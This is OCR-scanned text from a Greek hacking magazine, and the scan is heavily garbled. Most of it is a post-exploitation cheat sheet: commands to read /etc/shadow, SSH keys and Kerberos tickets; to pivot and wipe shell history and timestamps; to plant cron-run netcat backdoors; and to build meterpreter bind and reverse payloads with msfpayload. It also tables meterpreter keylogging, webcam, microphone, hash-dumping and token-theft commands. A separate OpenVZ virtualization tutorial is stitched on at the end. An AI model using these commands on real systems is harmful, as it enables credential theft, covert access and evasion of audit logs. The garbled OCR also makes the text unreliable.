iptables -L -n -v Λίστα ([L]ist) των kavovav iptables ([n]umeric, 
[v]erbose]) (απαιτεἰ root privileges) 
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Εντολἠ Επεξήγηση 


5 Λίστα των entries του πίνακα ΝΑΤ (Network Ad- 
iptables -t nat -L -n -v . ; ne 

dress Translation) (απαιτεί root privileges) 
which εντολή Εντοπισμὀς της εντολἠς 
locate αρχείο Εντοπισμὀς αρχείου 


Ἐλεγχος εγκατάστασης και ἐκδοσης Tou GNU 
Compiler Collection 


mysqli --version Ἐλεγχος εγκατάστασης και ἐκδοσης της MySQL 
Ἐλεγχος εγκατάστασης και ἐκδοσης της Perl 
python --version Ἐλεγχος εγκατάστασης και ἐκδοσης της Python 
Ἐλεγχος εγκατάστασης και ἐκδοσης της Ruby 
java -version Ἐλεγχος εγκατάστασης και ἐκδοσης της Java 
cat /etc/*release Ἐλεγχος διανοµἠς 


cat /etc/motd Εμφάνιση του Message of the day (MOTD) 


Σαβούρωμα! 
Έφτασε η WPA να φορέσουμµε το μαύρο eye-patch στο μάτι και να βάλου- 
µε TO γἀντζο στο χέρι ;) Ας αρχἰσουµε το πλιάτσικο... 

Εντολἠ Επεξήγηση 


Αρχεἰο µε τοπικά accounts του συστή- 
ματος 


Αρχείο µε τοπικἁ encrypted passwords 
cat /etc/shadow ee 4 nee YP j 
(απαιτεί root privileges) 


cat /etc/passwd 


Αρχεἰο µε Ta τοπικἁ account groups και 


cat /etc/group members 


Αρχεἰο µε Ta τοπικἀ account groups και 


cat /etc/gshadow members 


Αρχεἰο µε όλα Ta accounts (local, 


getent passwd LDAP, NIS κλπ) 


pdbedit -L Λίστα των accounts της samba 


Λίστα των accounts του Network Infor- 


ypcat passwd mation Service (NIS) 


/home/*/.ssh/id* Πιθανά SSH keys 


/tmp/krb5cc_* Πιθανά Kerberos tickets 


Αρχεἰο µε ὁλα Ta groups (local, LDAP, 
getent group NIS κλπ) 
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Εντολἠ Επεξήγηση 


/tmp/krb5.keytab Πιθανά Kerberos tickets 
/home/*/.gnupg/secring.gpgs Πιθανά PGP keys 


Φυσικά μετά ano τα παραπάνω δεν σταματάμε. Μόλις αρχίσαμε! Ac ouve- 
χίσουμε λοιπὸν µε διάφορα configuration files, τα onoia εἶναι ἀχρηστα για 
την Mpa, αλλά μπορεί να φανούν πολύτιμα αργότερα. 


Εντολή Επεξήγηση 


cat /etc/issue System info 
cat /etc/issue.net System info remote login 


cat /etc/master.passwd Το αρχείο ano Onou προέρχεται To passwd 
cat /etc/hosts Hosts file 

cat /etc/crontab Cron (scheduled tasks) configuration file 
cat /etc/sysctl.conf System variables 

cat /etc/syslog.conf Configuration file Tou syslog daemon 


cat /etc/lighttpd/lighttpd. 


Light HTTP daemon configuration 
conf 


cat /etc/cups/cupsd. 


confcda Common Unix Printing system configuration 


cat /opt/lamp/etc/httpd. 
conf 


Apache configuration file 


cat /etc/samba/smb.conf Samba configuration file 


cat /etc/openldap/Idap. 


conf LDAP configuration file (preferred) 
cat /etc/Idap/Idap.conf LDAP configuration file 


Configuration files yia Ta exported file 


at /etc/e t 
cat / /exports systems 


cat /etc/auto.master Automount configuration file 


cat /etc/fstab File system table 


cat /etc/inetd.conf Configuration file Tou Internet service 
daemon 


Πολλές φορές δεν θα καταφέρουμε να εκτελέσουµε ὁσα θέλουμε, ENEI- 
on δεν έχουμε επαρκἠἡ δικαιώματα. Δυστυχώς δεν μπορούμε να κάνουμε 
πολλὰ γι’ αυτὀ. Αυτή εἶναι και η ομορφιά των συστημάτων Linux και της 
αυξημένης τους ασφάλειας. Δεν παραδίδουµε τα ὀπλα, ὁμως! Υπάρχουν 
ἑνα δύο πραγματάκια που θα μπορούσαμε να δοκιµάσουμε: Κατ’ αρχάς, 
μπορούμε να ψάξουμε για misconfigured file access rights. Βέβαια, το 
να πειράξει ἑνας administrator τα δικαιώµατα πρὀσβασης σε σημαντικἁ 
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αρχεἰα εἶναι τουλάχιστον παράξενο. Ωστόσο συμβαίνει σχετικἁ συχνὰ και 
καλό θα ἦταν ρίξουμε µια ματιὰ. 


Εντολἠ Επεξήγηση 


Is -alh /root/ Εμφάνιση όλων των περιεχομένων του καταλόγου root 


Λίστα των επιτρεπτὠν εντολών του καλούντος χρήστη 


cat /ete/ Εμφάνιση του στὠν που ανήκουν στο sudoers group 
sudoers HỌ n xen η 


cat /etc/shadow | Αρχείο µε τοπικἁ encrypted passwords 


Θα μπορούσαμε επἰσης να επιτύχουμε privilege escalation µέσα and 
application, services ἡ και kernel exploits. Αυτό βέβαια θα απαιτούσε ap- 
κετἠ προσπάθεια και αναζήτηση στο Διαδίκτυο για το κατάλληλο exploit/ 
shell code. Κάτι τέτοιο ξεφεύγει and τα όρια αυτού του άρθρου. 


Pivoting 


H φάση Tou pivoting σε συστήματα Linux ἐχει εντελώς διαφορετικἠ Φιλο- 
oogia. Στηρἰζεται κυρίως στη χρήση του SSH client σε master mode (με 
το switch -Μ). Με αυτόν τον τρὀπο επιτρέπονται πολλαπλές συνδέσεις, 
Χωρίς να απαιτείται re-authentication για τα ἴδια tokens. Εξετάζοντας 
το αρχείο known_hosts κάτω ano το ~/.ssh μπορούμε να δούμε ἄλλους 
hosts που εμπιστεύονται τον τρέχοντα χρήστη. Επίσης, ρίχνοντας µια 
ματιά σε ὁσα μαζέψαμε προηγουμένως, ενδέχεται να βρούμε και τα OXE- 
τικἁ SSH keys. Με παρόμοιο τρόπο μπορούμε να εκμεταλλευτούμε και TO 
Kerberos authentication. 


Ἀλλες τεχνικὲς pivoting περιλαμβάνουν port forwarding και port binding, 
εἶτε μέσω του SSH (ssh -D ἡ ssh -R -L για remote/local binding) εἰτε 
μέσω ἄλλων εργαλείων (π.χ., netcat, socat, tcpxd), τα οποία χρησιμοποι- 
οὖμε ως TCP proxies. 


Τέλος, υπάρχει και η περίπτωση Tou pivoting ano ἑνα σύστημα Linux σε 
ἑνα Windows box. Σε αυτά τα σενάρια χρησιμοποιούνται patched SAMBA 
tools και patched remote execution tools (n.x., winexec). Βέβαια, σε αυ- 
τὲς τις περιπτώσεις το Metasploit έχει την τιμητική του! 


Εκκαθάριση 


Μετὰ ano την αναγνώριση στὀχου, To pillaging και To pivoting, περνάμε 
στη φάση του cleanup και Tou persistence. Πα την απομάκρυνση των 
IXVMV και των πάσης φύσεως ενοχοποιητικὠν στοιχείων, πρέπει να £ni- 
κεντρώσουμε την προσοχή µας στο ιστορικὀ του συστήματος και στα 
timestamps. 


Εντολἠ Επεξήγηση 


τ : λητή HISTFILE ἧς... 
export HISTFILE= elie a τη ΒΕΤΑΡΛΙΠΗ HIS της τιµῆς 


unset HISTFILE Διαγραφή της μεταβλητή HISTFILE 
history -c Εκκαθάριση του command history 
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Εντολἠ Επεξήγηση 


<space>history -c Bypass ενός fake alias της εντολής history! 


rm -rf ~/.bash_ 
history && In -s Διαγραφή των περιεχομένων του bash_history και 


«~/.bash_history / ανακατεύθυνση του στο /dev/null!! 
dev/null 


touch ~/.bash_ Neipayya των timestamps των περιεχομένων του 
history bash_history 


H διατήρηση (persistence) της πρὀσβασης σε Eva σύστημα µπορεἰ va 
εἶναι and πολύ EUKOAN υπόθεση, EWS αδύνατη! Πα παράδειγµα, ἐχοντας 
υποκλέψει valid SSH keys ἡ Kerberos tickets κι εφόσον οι σχετικὲς unn- 
ρεσἰες παραμένουν EVEPYEG, GNOKTGHE πρὀσβαση εὐκολα και νόμιμα. Eni- 
πρόσθετα, αν έχουμε καταφέρει ν’ αποκτήσουμε root access (π.χ., µε 
privilege escalation µέσω κάποιου zero-day) εἶναι καλὴ ιδέα να δηµιουρ- 
γήσουμε νέους χρήστες, ὥστε να συνεχίσουμε να συνδεόμαστε στο OÙ- 
στηµα εὐκολα. Εξάλλου, μπορούμε πάντα να δημιουργήσουμε temporary 
listeners, στους οποίους θα μπορούμε αργότερα να συνδεθούμε. Πρακτι- 
κά, θα χρησιμοποιήσουμε κἄποιο εργαλείο σαν το netcat, το socat ἡ To 
cryptcat, To οποίο θα φροντίσουμε να εκτελεἰται πάντα (µε τη βοήθεια 
ενὸς κατάλληλου cron job, του inittab ἡ Tou init.rd) και το οποίο θα 
λειτουργεἰ ως backdoor. Μπορείτε να βρείτε μερικἁ ενδιαφἐροντα napa- 
δείγματα στο site του @pentestmonkey (http://pentestmonkey.net/cheat- 
sheet/shells/reverse-shell-cheat-sheet). 


Av αποτύχουν όλα τα παραπάνω, τότε η μόνη Ἐπιθανἠήξ λύση απαιτεί τη 
χρήση advanced malware και rootkits, µε reverse shell payloads :S 


Έτσι Session 
opened και 
meterpreter 
prompt! Ti ἀλλο va 
ζητήσει κανείς; 


File Edit View Search Terminal Help 


The meta-interpreter 


Πρέπει va παραδεχτούμε πως EITE ο στόχος µας εἰναι Linux based eiTe 
Windows based, οι διαδικασίες που περιγράψαµε ως τώρα γίνονται ὁμορ- 
φα κι εὐκολα, χρησιμοποιώντας το Metasploit. 


O ντὀρος γύρω ano το Metasploit framework εἶναι πολὺς και δικαιολο- 
γημένος. Πρόκειται για µια προσπάθεια ανάπτυξης ενὸς προχωρημένου 


Εκτέλεση Tou 
winenum script σε 
Windows host. Σας 
θυμίζουν κάτι οι 
EVTOAEG; 
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exploitation framework, η onoia 
ξεκίνησε ano την ἴδια την κοινότη- 
τα των προγραμματιστῶν και των 
pentester, ενώ (σχετικἁ) πρὀσφα- 
τα αποκτήθηκε ano την Rapid7. Βὲ- 
Baia, παράλληλα µε την εµπορικἠ 
ἐκδοση (Pro) του Metasploit συνε- 
χἰζει και η ανάπτυξη της ελεύθερης 
εκδοχής, η οποία διατίθεται δω- 
peav. Παρόλο που η Rapid7 --για 
τους δικούς της, μαρκετίστικους 
λόγους-- παρουσιάζει το Metasploit 
σαν ἑνα εργαλείο pentesting, στην 
ουσία πρὀκειται για κάτι πολύ pE- 
γαλύτερο: Εἶναι µια πλατφόρμα 
ανάπτυξης εξελιγμένων exploits 
και πολύπλευρων εὐχρηστων 
payloads, για κάθε περἰσταση! Ou- 
σιαστικἀ, μέσω του Metasploit (και 
του ομολογουμένως εὐχρηστου 
Armitage GUI) μπορούμε va εντο- 
πἰσουμε και νε εκμεταλλευτούμε 
δεκάδες αδυναμίες σε Eva σύστη- 
μα. 


Το πιο διαδεδομένο payload εἰ- 
ναι το meterpreter. Θα λέγαμε ὁτι 
λειτουργεί σαν ἑνα multi-session 
κέντρο ελέγχου (command & 
control), το οποίο δέχεται και δι- 
οχετεύει EVTOAEG στα συστήματα 
που ἐχουμε καταλάβει. Το ἰδιο το 
meterpreter μπορεὶ να χρησιμο- 
ποιηθεἰ σαν bind shell (bind_tcp), 
oav reverse shell (reverse_tcp), 
σαν payload µέσα στο Metasploit 
framework, αλλά και σαν αυτόνομο εκτελέσιμο, που µε κἄποιο τρόπο 
καταφέραμε να εκτελέσουµε στο μηχάνημα στόχο (π.χ., µε remote file 
inclusion). 


Πα παράδειγµα, ἑνα Windows meterpreter binary θα μπορούσε va λει- 
τουργἠσει ως EENG: 
[Bind Shell] 


./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > 
meterpreter.exe 


./msfcli exploit/multi/handler PAYLOAD=windows/meterpeter/bind_ 
tcp LPORT=443 RHOST=<IP> 


[Reverse Shell] 


./msfpayload windows/meterpreter/reverse_tcp RHOST=<IP> 
RPORT=443 X > meterpreter.exe 


./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/ 
reverse ερ LPORT=443 E 


Ὅπως και να χει Eva επιτυχημένο exploitation µε payload το meterpreter 
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θα µας ειδοποιήσει για Ta sessions που ἄνοιξε και θα µας οδηγήσει στο 
OXETIKO Command-line shell, ὀπου μπορούμε να αλληλεπιδρούμε µε τα 
ανοιχτὰ sessions και να εκτελούμε εντολὲς στο σύστημα. Μέχρι τώρα δεν 
έχουµε κάποια διαφορὰ ano τις προηγούμενες περιπτώσεις, µε Command 
execution. Εκεἰ που πραγματικἁ διαπρέπει το meterpeter εἶναι οι navi- 
σχυρες εντολὲς του, που διαχωρίζονται σε built-in commands, libraries 
(δηλαδή καινούργια set εντολών) και scripts (για κάθε περίσταση, τα πιο 
Πολλά user based). Αν αυτὀ δεν εἶναι ο παράδεισος του post-exploitation 
τότε τι εἶναι; 


Πάμε λοιπὀν να δούμε κάποιες and τις εντολὲς του meterpreter, αφού 
προηγουμένως αναφέρουμε την ενσωματωμένη εντολὴ help, η οποία na- 
ρἐχει βοήθεια ava πάσα στιιγµἠ και για οτιδήποτε θελήσουμε. Θα ξεκι- 
νήσουμε and τον τρόπο που το meterpreter αλληλεπιδρά µε τα ανοικτά 
sessions, καθὼς και and τον τρόπο µε τον οποίο καλούνται οι διάφορες 
βιβλιοθήκες και Ta scripts του. 


Εντολἠ Επεξήγηση 


Μεταφἑρει Eva session ano το προσκήνιο στο 
background Ῥ Ρ Ρ η 

παρασκήνιο 

Λἰστα µε τα ανοιχτά sessions μαζί µε τα ID 

τους 


R Ξ à Μεταφἑρει To session pe ID <session ID> στο 
session -i <session ID> h 
προσκήνιο 
use <library> Χρήση µιας εκ των βιβλιοθηκών (espia, 
incognito, priv και sniffer) 


To meterpreter παρέχει πλήρη διαχείριση του file system Tou κατειλημμὲ- 
νου μηχανήματος. Ὅσοι ἐχουν εμπειρία µε Linux και FTP servers δεν θα 
δυσκολευτούν καθόλου... 


Εντολἠ Επεξήγηση 


σπα 


upload <source> <dest> Upload αρχείου ano τον host 
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Εντολή Επεξήγηση 


H εμφάνιση πληροφοριών για τη δικτύωση εἰναι εξίσου πανεύκολη, HE TNH 


βοήθεια του meterpreter: 


Εντολἠ Επεξήγηση 


| ipconfig ο Εμφάνιση πληροφοριών για To networking Tou host 
ΠΠ Εμφάνιση και διαχείριση Tou routing table στον host 
portfwd [options] | Port forwarding ενός local port σε Eva remote service 


Το μεγαλύτερο ὁπλο του meterpreter σχετίζεται µε TO remote command 


execution: 


Εντολἠ Επεξήγηση 


[ps icra hw τῶν active processes 


Εμφάνιση του User ID κάτω and τον οποίο 
τρέχει TO payload 


getpid Εμφάνιση του Process ID του payload 


migrate <pid> Μετανάστευση του payload σε νέο process (πιο 
σταθερὀ κλπ) 
Επιστροφἡ στο αρχικὀ User ID (µετά and im- 
personation) 


execute -f <file> 
[options] 


kill <pid> Σταμάτημα της εκτέλεσης του process µε ID 
<pid> 
. Διαχείριση του μητρώου συστήματος (registry) 
reg [command] [options] av o host εἶναι Windows based 


Πληροφορίες συστήµατος Tou host 
[ΕΠ Interactive shell στον host 
Καθάρισμα των events στον host 


1 ti ᾗ tok a 
steal_ token <pid> mpersonation HE χρήση Tou token ano το 
process µε ID <pid> 


drop_token Απὀρριψη κάθε token nou γίνεται impersonate 


Απόκτηση ὁσο το δυνατὸν περισσότερων sys- 
tem privileges 


Υπάρχει ακόµα µια κατηγορἰα ενσωματωμένων εντολών, που επηρεάζουν 


Εκτέλεση αρχείου στον host 


τη συμπεριφορά/λειτουργία του ξένου μηχανήματος: 
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Εντολἠ Επεξήγηση 


keyscan_start Έναρξη keylogging στον host 
keyscan_stop Λήξη keylogging στον host 


Εμφάνιση των καταγεγραμμένων key strokes 
ano το keylogging 


Enable/disabl κ d 
uictl [command] [device] ne e/disable Tou keyboard/mouse oTov 


keyscan_dump 


Λίστα όλων των active camera devices 
webcam_snap [options] Λήψη στιγμιότυπου ano ἑνα camera device 


record_mic [options] Ηχογράφηση µέσω του μικροφώνου Tou host 


Μήπως νομίζετε ὁτι τελειώσαμε µε TO meterpreter; Όπως εἶπαμε npon- 
γουμένως, οι εντολὲς του μπορούν να επεκταθούν µε τη βοήθεια diago- 
ρων βιβλιοθηκὠν. Μέχρι στιγµἠς εἶναι διαθέσιμες τἐσσερις: 


Espia (για screen capturing) 
Incognito (µε εντολές για user impersonation) 
Priv (µε εντολές σχετικές µε τα δικαιώµατα των χρηστών) 
Sniffer (µε εντολές για network sniffing και packet capturing) 
H πρὠτη βιβλιοθήκη, για την ὥρα τουλάχιστον, περιλαμβάνει µόνο pia 


εντολή: 


Εντολή Επεξήγηση 


screengrab <file> | Λήψη στιγμιότυπου οθόνης Tou host σε αρχείο 


Η βιβλιοθήκη incognito περιλαμβάνει τις ακὀλουθες: 


Επεξήγηση 


Λἰστα ὁλων των διαθέσιμων tokens για το 
Χρήστη 


ΝΠ πας Impersonation χρήστη µέσω token 
<token> Ρ Χρήστη H 

που user Προσθἠκ OTN σε global grou στὠν 
<group><user> pooenkn χρήστη GEG group χρη 


add_localgroup_user Προσθήκ ioe toniko eer κο 
<group><user> ροσνηκη Χρήστη group xpn 
ος ο, χρήστη ον ina ; ea 


Apnayn challenge/response hashes για κάθε 
token 
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Πολύ ενδιαφέρουσες εἶναι και οι EVTOAES της βιβλιοθήκης Priv. 


Εντολή Επεξήγηση 


s Προσπάθεια απὀκτησης system privileges 
getsystem [options] P ; MONS Sy Ρ 9 
μέσω 4 τεχνικὠν 


Απόκτηση των περιεχόµενων της SAM 
database (Windows OS) 

timestomp <file> [options] Επεξεργασία created, accessed, modified 
timestamps αρχείου 


Για το τέλος, δείτε και τις εντολὲς ano τη βιβλιοθήκη sniffer. 


Εντολἠ Επεξήγηση 


z « Λίστα όλων των διαθέσιμων network 
sniffer_interfaces : 
interfaces 


sniffer_start <if_no><buffer> Έναρξη capturing στο interface <if_no> 


sniffer_stop <if_no> Λήξη capturing στο interface <if_no> 
= 9 Í turi 
sniffer_stats <If_no> ; TATIOTIKG Του ενεργού capturing στο 
interface «ἰξ πο» 
Ano i EVWV TOU 
sniffer_dump <if_no><file> ποκτηση σε αρχείο των δεδομένων το 
capturing 


Av όλα auTd σας φαίνονται υπεραρκετὰ για Eva επιτυχημένο exploitation, 
περιμένετε va Seite και τα διαθέσιµα scripts! Εἶναι όλα τους γραμμένα σε 
Ruby και, σε γενικὲς γραμμές, av ασχοληθεἰτε σοβαρὰ θα μπορέσετε να 
αναπτύξετε και τα δικἁ σας. Έχετε υπόψη ὁτι το meterpreter διαθέτει 
ἑνα interactive Ruby shell, στο onoio µπορεί κανεὶς να γράψει τα δικἁ 
του scripts και να τα δοκιμάσει απευθείας στο κατειλημμένο μηχάνημα 
(το οποίο κάλλιστα µπορεί να εἶναι κἄποιο VM, ὡστε να πειραματίζεστε 
µε την ἀνεσή σας). Post-exploitation στο ἐπακρο, λοιπὀν, µε τη βοήθεια 
του meterpreter και µια «φαρέτρα» ano πολύπλευρες, πολυδύναμες KI 
αποτελεσματικὲς εντολὲς και Scripts! 


And the winner is... 


Πιθανώς va σας ζαλίσαμε µε τα δυο απανωτά ἀρθρα για το post- 
exploitation. Εἶναι γεγονὸς ὁτι µια WYN παράθεση εντολών, χωρίς την 
παρουσίαση ενὸς ρεαλιστικοὐ σεναρίου, γίνεται εὐκολα κουραστικἠ. 
Ὅμως δεν εἶχαμε πρὀθεση να σας παιδέψουμε. Αντίθετα, σχεδιάσαµε 
αυτά Ta ἀρθρα ώστε να αποτελούν χρήσιμους (θέλουμε να πιστεύουμε) 
οδηγούς αναφοράς, στους οποίους θα µπορείτε να ανατρἐχετε κᾶθε φορά 
που θέλετε να θυμηθείτε κάτι. Φανταστείτε τα ως Eva post-exploitation 
command index, ¿va cheat-sheet ἡ κάτι τέτοιο, τέλος πάντων! Στο μεγά- 
Ao θέµα του post exploitation θα επανερχόµαστε, ενὠ σε ἄλλα άρθρα θα 
δείχνουμε και NOG εἶναι δυνατὸν ν΄’ αποκτούµε πρὀσβαση σε αποµακρυ- 
σµένους στόχους. Φυσικά, θεωρούμε δεδομένο ὁτι Ta virtual machines 
και Ta virtual labs θα εἶναι απαραίτητα εργαλεία, σε αυτὲς µας τις περι- 
πέτεις. Μείνετε συντονισμένοι, λοιπὸν, και αρχἰστε τα παιχνἰδια και το 
ψάξιμο ano τώρα. Μόνο προσοχή, γιατὶ υπάρχει σοβαρὸς κἰνδυνος... πώ- 
ρωσης! 


Όπως ακριβώς 
μοιραζόμαστε 
τον κώδικά µας, 


> έτσι θέλουμε να 
μοιραστούμε και 

--- τις Ιδέες ac! 

hack Γιατί λοιπόν να 
ac erspace.or μην το κάνουμε 
Αμπατιέλου 11, Αθήνα ô a7 
πλησίον ΗΣΑΠ Ay. Ελευθέριος QTO κοντα; 
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H φιλοσοφία Tou OpenVZ εἶναι διαφορετικἠ ano εκείνη Tou VirtualBox ἡ 
Tou VMware. Έτσι, αφού εγκαταστήσουµε Ta anapaitnta εργαλεἰα για τη 
δηµιουργία των εικονικὠν μηχανών, θα αναφερθούμε και στη λογική που 
διέπει τη λειτουργία τους. Τέλος, για να SIEUKOAUVOUHE τη διαχείριση του 
OpenVZ node, θα προσθέσουμε κι Eva panel διαχείρισης. Φανταστείτε 
ἑναν πἰνακα ελέγχου, παρόμοιο µε εκείνον που προσφέρουν διάφορες 
εταιρείες VPS! Πα τη συνέχεια, θεωρούμε δεδομένο OTI ἐχετε διαβάσει TO 
ἆρθρο που αρχίζει ano τη σελἰδα 36 του τεύχους που κρατάτε στα χέρια 
σας. (Σ.τ.Ε. H ἴδια σελίδα ενὸς οποιουδήποτε ἄλλου τεύχους το οποίο 
ενδεχομένως πιάνετε τώρα στα χέρια σας, δεν έχουμε ιδέα τι μπορεί va 
έχει. Μας εἶναι παντελώς άγνωστο. Σαν την κατάσταση της γάτας του 
Σρέντιγκερ, Eva πράγμα, πριν ανοἰξουµε εκεἰνο το KOUTI. Και val, EXETE 
δίκιο. Πρέπει να αραιώσουμε κάπως To The Big Bang Theory.) 


Εγκατάσταση vzctl 


Το βασικότερο εργαλεἰο για τη διαχείριση των OpenVZ virtual machines 
εἶναι το vzctl. Με τη βοἠθειἁ του μπορούμε να δημιουργούμε EIKOVIKEG 
μηχανές και να EKTEAOUHE EVTOAEG στο “εσωτερικό” τους. Αν AUTÒ σας 
μπέρδεψε, µην ανησυχείτε καθόλου. Θα κατανοήσετε τα πάντα σε λἰγο, 
ὁταν τα δούµε στην πράξη. Πα την ώρα προέχει η εγκατάσταση του npo- 
γράμματος, η οποία πραγματοποιείται εκτελώντας το ακόλουθο: 


yum install vzctl vzquota 


Εντάξει, µας πιάσατε! Με την εκτέλεση του παραπάνω θα εγκατασταθεἰ 
και το vzquota, για το onoio δεν σας εἶπαμε λέξη. Πρόκειται για Eva βο- 
ηθητικὀ πρὀγραµμµα που θα χρειαστεἰ στη συνέχεια. Με τη βοήθειά του 
μπορούμε να περιορἰζουμε τον αποθηκευτικὀ χώρο που EXE! στη διἀθεσἠ 
της κάθε εικονικἠ μηχανή. Μήπως κι αυτό σας μπερδεύει; Σας προειδο- 
ποιήσαμε: H λογική του OpenVZ εἶναι διαφορετικἠ απ΄ ὁσα ξέρουμε ;) 
Ωστόσο, να εἶστε βέβαιοι ὁτι σύντομα θα ξεκαθαρἰσουν ὁλα... 


Ζήτημα δικτύωσης 


Υπάρχουν πάμπολλοι τρόποι για να δικτυώσει κανεὶς τις εικονικὲς µηχα- 
VEG HE TO OpenVZ. H πιο συνηθισμένη τακτικἠ εἶναι να τοποθετούνται 
όλα Ta virtual machines στο δικὀ τους subnet και να χρησιμοποιούν ως 
gateway το OpenVZ node. Με αυτόν τον τρὀπο, η δικτυακἠ κίνηση απὀ 
και προς τις εικονικἐς μηχανὲς διέρχεται εξ ολοκλήρου απὀ το μηχάνημα 
µε TO OpenVZ. Αυτὀ το σετάρισµα απαιτεἰ αρκετἠ δουλίτσα και μεταξύ 
ἄλλων περιλαμβάνει την κατάλληλη ρύθμιση του iptables. Όπως αντι- 


oP root@Slave-PC:~ =| Σε 


Χρησιμοποιώντας 
το πρόγραµµα 
vzlist, μπορούμε 
να δούμε ὀλα Ta 
ενεργό virtual 
machines Tou 
συστήµατος. Στην 
περίπτωση που θα 
θέλαμε να εµφα- 
νιστούν *kal* τα 
ανενεργὀ, θα ap- 
κούσε να δώσουμε 
την παράμετρο -ᾱ. ν a 
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λαμβάνεστε, σε µια τόσο περίπλοκη διαδικασία εἶναι εὐκολο να γίνουν 
λάθη και δύσκολο να εντοπιστούν και να διορθωθούν. Εμεὶς, τώρα, Ot- 
λουµε απλά να κάνουμε δοκιμὲς και να παίζουμε pE TIG EIKOVIKEG μηχανὲς. 
Δεν υπάρχει λοιπὸν κανένας λόγος να τις απομονώσουμε στο δικὀ τους 
subnet. Θα εἶναι όλα πολύ πιο απλά, αν τις συνδέουµε ὁλες στο ἰδιο õi- 
κτυο µε αυτό που ανήκει το σύστημα µε TO OpenVZ. 


Αρχικἀ, πρέπει να επισκεφτούµε το web interface του router µας και va 
τσεκάρουµε τις ρυθμίσεις του DHCP. Ουσιαστικά, αυτὸ που θέλουμε να 
μάθουμε εἰναι η περιοχἠ των διευθύνσεων, τις οποἰες μοιράζει αυτόμα- 
τα ο server. Στη δικἠ µας περίπτωση, το τοπικὀ δίκτυο χρησιμοποιού- 
σε διευθύνσεις της μορφής 192.168.1.*, ενώ ο DHCP ἠταν ρυθμισμέ- 
νος ὥστε να μοιράζει διευθύνσεις στην περιοχἠ ano 192.168.1.100 ἑως 
και 192.168.1.200. (Σ.τ.Ε. Κάποιος αντιγράφει τις ρυθμἰσεις του δικού 
μου router ἡ εἶναι η ιδέα µου;) Έτσι, αποφασίσαμε OTI οι εικονικὲς nxa- 
νὲς µας θα xouv διευθύνσεις στην περιοχἠ and 192.168.1.201 Ewe και 
192.168.1.250. Κάτι μας λέει ὁτι μάλλον δεν θα καταφέρουμε να σηκώ- 
σουµε 50 VMs ταυτόχρονα, οπότε νομίζουμε ὁτι η περιοχὴ εἶναι ευρύ- 
χώρη. Ας δούμε τώρα πὼς δημιουργούνται οι EIKOVIKEG μηχανές και θα 
κατανοήσετε αμέσως ὁλα ὁσα EXOUHE αναφέρει μέχρι στιγμής. 


Ζεστά κι αχνιστά VMs 


Ὅπως ἐχουμε πει, κάθε virtual machine του OpenVZ αποτελεἰ Eva ξεχω- 
ριστὸ κελἰ κι εκτελείται αυτόνομα and το υπόλοιπο σύστημα. Ωστόσο, 
όλα τα κελιά μοιράζονται τον ἴδιο πυρήνα. Το yeyovoc αυτό ενδέχεται να 
OONYNOE! κάποιον στο συμπέρασμα ὁτι όλες οι εικονικὲς μηχανές πρέπει 
να τρέχουν την ἰδια διανομή Linux. Τα πράγματα ὁμως δεν εἶναι ἐτσι! Με 
το OpenVZ μπορούμε να δημιουργούμε EIKOVIKEG μηχανὲς οι οποίες θα 
τρέχουν (σχεδὸν) οποιαδήποτε διανοµή. Μήπως αυτό σημαίνει ὁτι πρέπει 
να κατεβάσουµε τα ISO images ònoiwv διανομών επιθυμούμε; Και πάλι 
ὀχι! Στις εικονικὲς μηχανές του OpenVZ δεν πραγματοποιείται κάποιου 
εἶδους εγκατάσταση του λειτουργικού. Αντίθετα, η ἴδια η δηµιουργία της 
εικονικἠς µηχανἠς περιλαμβάνει τη δημιουργία όλων των αρχείων, που 
απαρτίζουν την επιθυμητή διανομὴ. Ωραία, θα σκεφτεὶ κανείς. Εγὠ ano- 
φασίζω ποια διανομὴ θέλω, το δηλώνω µε κάποιον τρόπο στο OpenVZ κι 


Γ΄ = —— 3 F Γη 
oP root@centos:/vz/template/cache 5 S| 


ων, - s 


+ (ett) 


H χειροκίνητη 
εγκατάσταση των 
templates δεν εἰναι 
καθόλου δύσκολη. 
Αρκεί να μεταβού- 
µε στον κατάλογο / 
vz/template/cache 
και να κατεβόσου- 
µε το επιθυμητό 
template, µε Eva 
εργαλείο σαν το 
wget. Μια λίστα 

με templates και 
τα αντίστοιχα URL 
εἶναι στο http:// 
wiki.openvz.org/ 
Download/template/ 
precreated. 
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ἂν Login - OpenVZ Web Pane i 


- ο fi |O 192.168.118.128:3000 


HE 


| δ Log in to OpenVZ Web Panel 2.1 
| 


User name: | 
| 

Password: 

Language: English (en) 
Remember me: [V 


Restore password 


= Log in 


To web panel εἶναι 
έτοιμο και περιμὲ- 
νει να συνδεθού- 
µε µε Ta default 
credentials! Θα 
ήταν φρόνιμο va 
αλλάξουμε ἆμεσα 
τον κωδικὀ του 
χρήστη admin, 
παρόλο που To 
OpenVZ node 
βρίσκεται εντὀς 
του τοπικού µας 
δικτύου. 
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αυτό δημιουργεί µια εικονικἠ μηχανὴ, η οποία περιέχει ἠδη την επιθυμητή 
διανομή. Αυτὀ εἶναι πολύ εξυπηρετικὀ, αλλά πὠς επιτυγχάνεται; 


Νομίζουμε ὁτι αν κάνετε µια βόλτα ano το wiki του OpenVZ, θα καταλά- 
βετε πολύ γρήγορα τι συμβαίνει. Συγκεκριµένα, αρκεὶ να ρἰξετε µια ματιὰ 
στη σελἰδα 


http://wiki.openvz.org/Download/template/precreated 


To OpenVZ δημιουργεὶ εικονικὲς μηχανές χρησιμοποιώντας ἑτοιμα πρὀ- 
Tuna (templates), καθένα ano τα οποία αποτελεἰ Eva archive µε Ta αρχεἰα 
της εκάστοτε διανομής. Στη σελἰδα που σας παραπέμψαμε προηγουμένως 
μπορείτε να δείτε τα templates που έχουν δημιουργήσει οι προγραμµατι- 
OTEG του OpenVZ, καθὼς και πολλά ακόμα, που ¿xouv συνεισφέρει ἄλλοι 
χρήστες και προγραμματιστὲς (contributed). Ας αφήσουμε ὁμως τη θεω- 
pid κι ας επιστρέψουµε στη δράση. ‘EXE! φτάσει η WPA να δηµιουργήσου- 
με την πρώτη µας εικονικἠ μηχανή, µε TO OpenVZ! 


Πα το πρώτο µας λοιπὸν virtual machine επιλέξαμε το Ubuntu 12.04. 
Ἔτσι, ξεκινήσαμε εκτελώντας τα ακόλουθα: 


OpenVz: AK-47s, for everyone! (μέρος 2) 


Αα 


(p root@ubuntu-test: / Ν = ᾿ > πλ 


cd /vz/template/cache 
wget http://download.openvz.org/template/precreated/ubuntu- 
12.04-x86.tar.gz 


Για να δημιουργήσουμε µια εικονικἠ μηχανὴ µε TO OpenVZ, πρέπει npo- 
